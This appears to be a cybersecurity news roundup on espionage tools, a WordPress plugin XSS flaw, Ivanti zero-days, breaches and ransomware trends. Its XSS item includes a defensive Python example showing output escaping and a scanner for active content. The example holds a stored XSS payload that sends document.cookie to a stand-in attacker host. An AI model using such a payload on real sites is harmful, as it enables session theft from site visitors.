In today’s cybersecurity news…
GoldenJackal uses new tools against governments
Security researchers at ESET published details on a cyberespionage group dubbed GoldenJackal, which has been active since at least 2019. The group uses previously unknown tools to attack air-gapped systems, targeting government entities across Europe, the Middle East, and South Asia. Researchers noted that GoldenJackal uses a highly modular approach to attack systems, using several tools across its attack chain. GoldenUSBCopy monitors for new USB drives and copies content to disk, GoldenBlacklist downloads email messages from local servers, and GoldenMailer exfiltrates files through email to attacker-controlled accounts. It’s unclear how GoldenJackal gains initial access. ESET didn’t attribute the group to any specific country other than saying its members likely speak Russian.
Cross-site scripting flaw found in major WordPress plugin
The LiteSpeed Cache plugin is installed on over 6 million WordPress sites. Security researcher TaiYou discovered three flaws in it, including an unauthenticated stored cross-site scripting flaw that lets an attacker escalate privileges and inject code into the site with a single HTTP request. The root cause is that the plugin did not sanitize input or escape output when serving a web page, so attacker-supplied markup was stored and later rendered as-is. The researcher reported the flaw through Patchstack to the plugin's developer, LiteSpeed Technologies, which released a patch within 24 hours. Patchstack recommends updating to the latest version of the plugin immediately.
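The missing-escaping pattern behind a stored XSS bug like this one, as an added illustration (this is not LiteSpeed Cache's code; the comment payload, the hypothetical attacker.example host, and the render functions are constructed for the example). It contrasts interpolating stored user data straight into HTML with escaping it at output time, the job that esc_html() and esc_attr() do in WordPress, and uses an HTML parser rather than a string search to check whether the rendered page contains active content, because an escaped payload still contains the literal text "onerror=".

```python
import html
from html.parser import HTMLParser

# Constructed sample: a comment a visitor submits and the site stores verbatim.
# A real payload would exfiltrate cookies or create an admin user; this one
# points at a hypothetical attacker-controlled host.
STORED_COMMENT = (
    "<img src=x onerror=\"fetch('https://attacker.example/?c='+document.cookie)\">"
)


def render_unsafe(comment: str) -> str:
    """Stored XSS: the stored value is dropped into the page with no escaping,
    so the browser parses the attacker's markup as part of the page."""
    return f'<div class="comment">{comment}</div>'


def render_safe(comment: str) -> str:
    """Escape at output time for the HTML text context (what esc_html() does in
    WordPress). The stored value is left alone; < > & and quotes become entities."""
    return f'<div class="comment">{html.escape(comment, quote=True)}</div>'


def render_attr_safe(title: str) -> str:
    """Attribute context needs quoting plus quote escaping (esc_attr() in
    WordPress); escaping only < and > is not enough here."""
    return f'<a href="/" title="{html.escape(title, quote=True)}">link</a>'


class ActiveContentScanner(HTMLParser):
    """Records script elements and on* event-handler attributes the browser
    would actually execute. Escaped text never reaches handle_starttag."""

    def __init__(self) -> None:
        super().__init__()
        self.findings: list[str] = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.findings.append("script element")
        for name, _value in attrs:
            if name.startswith("on"):
                self.findings.append(f"<{tag}> with {name} handler")


def active_content(rendered: str) -> list[str]:
    """Return a list of executable constructs found in a rendered HTML fragment."""
    scanner = ActiveContentScanner()
    scanner.feed(rendered)
    scanner.close()
    return scanner.findings


if __name__ == "__main__":
    for name, page in (("unsafe", render_unsafe(STORED_COMMENT)),
                       ("safe", render_safe(STORED_COMMENT))):
        print(f"{name}: {active_content(page) or 'no active content'}")
```

The scanner is the check a practitioner would run over a page fetched from a test site: if it reports anything for content that came from an unauthenticated user, the site has a stored XSS problem regardless of whether a signature matches a known plugin bug.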
Ukraine’s defense ministry launched military CERT
Since Russia invaded Ukraine, the conflict has had a persistent and evolving cyber element. Until now, Ukraine's Ministry of Defense relied on a dedicated team of cybersecurity professionals to protect its systems. This week, the ministry announced it had created a separate structural unit that would "expand its responsibilities in the field of cyber defense." The unit will operate as a military computer emergency response team under the Ministry of Defense, which will back it with funding and legislation. The team will also coordinate with NATO on future initiatives.
Salt Typhoon and the dangers of backdoors
Yesterday, we covered the compromise of wiretap systems across several US telcos by the China-linked threat actor Salt Typhoon. TechCrunch's Zack Whittaker published a piece framing the intrusion as a consequence of building legally required backdoors into communication networks. The 1994 Communications Assistance for Law Enforcement Act, or CALEA, requires telecommunications carriers to build lawful-intercept capabilities into their networks so they can comply with court-authorized wiretap orders; the systems Salt Typhoon reached are the ones that implement that requirement. In the piece, Georgetown Law professor Matt Blaze described this kind of attack as "inevitable" and said "CALEA should be regarded as a cautionary tale, not a success story, for backdoors."
Ivanti warns about more zero-days
Yesterday, Ivanti released updates to resolve three zero-days in its Cloud Services Appliance, or CSA, that are under active exploitation. The vulnerabilities are a SQL injection, an arbitrary code execution flaw, and a path traversal weakness on CSA gateways that can be used to bypass security restrictions. They affect CSA 5.0.1 and earlier, although Ivanti said the exploitation it observed was against customers running CSA 4.6, which reached end-of-life in September. Over the past several months, we've seen several Ivanti zero-days across various products. In response, the company said it is "making a large investment in Secure by Design across our organization and signed the CISA Secure by Design pledge in May."
MoneyGram confirms data loss in cyberattack
The money transfer company suffered a cyberattack on September 20th that caused a week-long outage of its primary app and website. MoneyGram has now confirmed that the attackers stole customer data, including names, phone numbers, addresses, some Social Security numbers, government identification documents, and transaction data. There is no word on how many customers the breach affected. According to its filings, the company serves over 50 million people across 200 countries and territories annually.
Europol hackathon looks to combat human trafficking
Europol recently held its EMPACT hackathon, bringing together 76 experts from 27 countries over four days to identify indicators of internet-enabled human trafficking and other illegal online activity. During the hackathon, law enforcement identified 16 suspected human traffickers and 60 potential victims. Investigators examined several platforms, including ones offering training courses for becoming "OnlyFans managers" that in practice taught users how to become digital pimps. They also discovered a dark web site used by hundreds of traffickers to sell or hire out victims.
Active ransomware groups on the rise
2024 saw several high-profile ransomware group takedowns, with more coordinated law enforcement efforts than ever. However, according to the Secureworks State of the Threat Report, the number of observed active ransomware groups rose 30% on the year, with 31 new groups identified. The report describes a more fragmented ransomware landscape driven by increased enforcement, with the ALPHV group no longer among the top three groups by number of victims. LockBit still accounted for 17% of all known victims, but that share is down 8% on the year. The PLAY group and RansomHub rounded out the top three. The increase in active groups did not bring a corresponding rise in the number of victims over the year.